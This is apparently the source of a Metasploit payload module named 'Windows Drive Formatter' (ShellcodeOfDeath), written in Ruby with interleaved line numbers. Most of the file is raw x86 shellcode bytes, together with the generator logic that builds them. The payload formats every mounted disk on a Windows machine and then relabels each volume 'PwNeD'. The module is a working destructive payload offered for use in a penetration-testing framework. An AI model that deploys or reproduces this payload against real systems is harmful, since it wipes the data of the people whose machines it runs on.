1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
###
7
#   Shellcode Of Death
8
#
9
#   Test bed:
10
#        x86: Windows XP SP3, Windows 2003 SP2, Windows 7
11
#        x64: Windows 8.1
12
#
13
###
14

15
module MetasploitModule
16
  CachedSize = 393
17

18
  Rank = ManualRanking
19

20
  include Msf::Payload::Windows
21
  include Msf::Payload::Single
22

23
  def initialize(info = {})
24
    super(
25
      update_info(
26
        info,
27
        'Name' => 'Windows Drive Formatter',
28
        'Description' => %q{
29
          This payload formats all mounted disks in Windows (aka ShellcodeOfDeath).
30

31
          After formatting, this payload sets the volume label to the string specified in
32
          the VOLUMELABEL option. If the code is unable to access a drive for any reason,
33
          it skips the drive and proceeds to the next volume.
34
        },
35
        'Author' => [
36
          'Ashfaq Ansari <ashfaq_ansari1989[at]hotmail.com>',
37
          'Ruei-Min Jiang <mike820324[at]gmail.com>'
38
        ],
39
        'License' => MSF_LICENSE,
40
        'References' => [
41
          [ 'URL', 'http://hacksys.vfreaks.com/research/shellcode-of-death.html' ],
42
          [ 'URL', 'https://github.com/hacksysteam/ShellcodeOfDeath' ],
43
        ],
44
        'Platform' => 'win',
45
        'Arch' => ARCH_X86,
46
        'Privileged' => true,
47
        'Notes' => { 'AKA' => ['ShellcodeOfDeath'] }
48
      )
49
    )
50

51
    # EXITFUNC is not supported
52
    deregister_options('EXITFUNC')
53

54
    # Register command execution options
55
    register_options(
56
      [
57
        OptString.new('VOLUMELABEL', [ false, 'Set the volume label', 'PwNeD' ])
58
      ]
59
    )
60
  end
61

62
  def generate(_opts = {})
63
    volume_label = datastore['VOLUMELABEL'] || ''
64
    encoded_volume_label = volume_label.to_s.unpack('C*').pack('v*')
65

66
    # Calculate the magic key
67
    magic_key = encoded_volume_label.length + 28
68

69
    # Actual payload
70
    "\xeb\x5a\x31\xc0\x8b\x34\x83\x01\xd6\x53\x50\x31\xdb\x31\xc0\xac\xc1\xc3\x05\x01\xc3\x83" \
71
      "\xf8\x00\x75\xf3\xc1\xcb\x05\x39\xcb\x58\x5b\x74\x03\x40\xeb\xde\xc3\x89\xd0\x8b\x40\x3c" \
72
      "\x8b\x44\x02\x78\x8d\x04\x02\x50\x8b\x40\x20\x8d\x1c\x02\xe8\xc3\xff\xff\xff\x5b\x8b\x4b" \
73
      "\x24\x8d\x0c\x0a\x66\x8b\x04\x41\x25\xff\xff\x00\x00\x8b\x5b\x1c\x8d\x1c\x1a\x8b\x04\x83" \
74
      "\x8d\x04\x02\xc3\x31\xc9\x64\xa1\x30\x00\x00\x00\x8b\x40\x0c\x8b\x40\x1c\x8b\x50\x08\x8b" \
75
      "\x78\x20\x8b\x00\x3a\x4f\x18\x75\xf3\x68\x64\x5b\x02\xab\x68\x10\xa1\x67\x05\x68\xa7\xd4" \
76
      "\x34\x3b\x68\x96\x90\x62\xd7\x68\x87\x8f\x46\xec\x68\x06\xe5\xb0\xcf\x68\xdc\xdd\x1a\x33" \
77
      "\x89\xe5\x6a\x07\x59\x31\xff\x83\xf9\x01\x75\x0c\x51\xeb\x1c\x8b\x44\x24\x1c\xff\xd0\x89" \
78
      "\xc2\x59\x51\x8b\x4c\xbd\x00\xe8\x6b\xff\xff\xff\x59\x50\x47\xe2\xe0\x89\xe5\xeb\x0f\xe8" \
79
      "\xdf\xff\xff\xff\x66\x6d\x69\x66\x73\x2e\x64\x6c\x6c\x00\xeb\x7e\x5e\x6a\x17\x59\x89\xcf" \
80
      "\x31\xd2\x52\x52\x6a\x03\x52\x6a\x03\x68\x00\x00\x00\xc0\x56\x8b\x5d\x14\xff\xd3\x50\x83" \
81
      "\xec\x04\x31\xd2\x52\x8d\x5c\x24\x04\x53\x52\x52\x52\x52\x68\x20\x00\x09\x00\x50\x8b\x5d" \
82
      "\x08\xff\xd3\xff\x74\x24\x04\x8b\x5d\x0c\xff\xd3\x8d\x86" +
83
      # You need to adjust this. Logic: encoded_volume_label.length + 28
84
      [magic_key].pack('C') +
85
      "\x00\x00\x00\x50\x68\x00\x10\x00\x00\x6a\x01\x8d\x86\x1a\x00\x00\x00\x50\x8d\x86\x10\x00" \
86
      "\x00\x00\x50\x6a\x0c\x8d\x46\x08\x50\x8b\x5d\x00\xff\xd3\x68\xc8\x00\x00\x00\x8b\x5d\x04" \
87
      "\xff\xd3\x89\xf9\x83\x46\x08\x01\xe2\x8d\x6a\x00\x8b\x5d\x10\xff\xd3\xe8\x7d\xff\xff\xff" \
88
      "\x5c\x00\x5c\x00\x2e\x00\x5c\x00\x43\x00\x3a\x00\x5c\x00\x00\x00\x4e\x00\x54\x00\x46\x00" \
89
      "\x53\x00\x00\x00" +
90
      # Volume Label, default: PwNeD
91
      encoded_volume_label +
92
      "\x00\x00\x55\x89\xe5\x31\xc0\x40\x5d\xc2\x0c\x00"
93
  end
94
end
95

96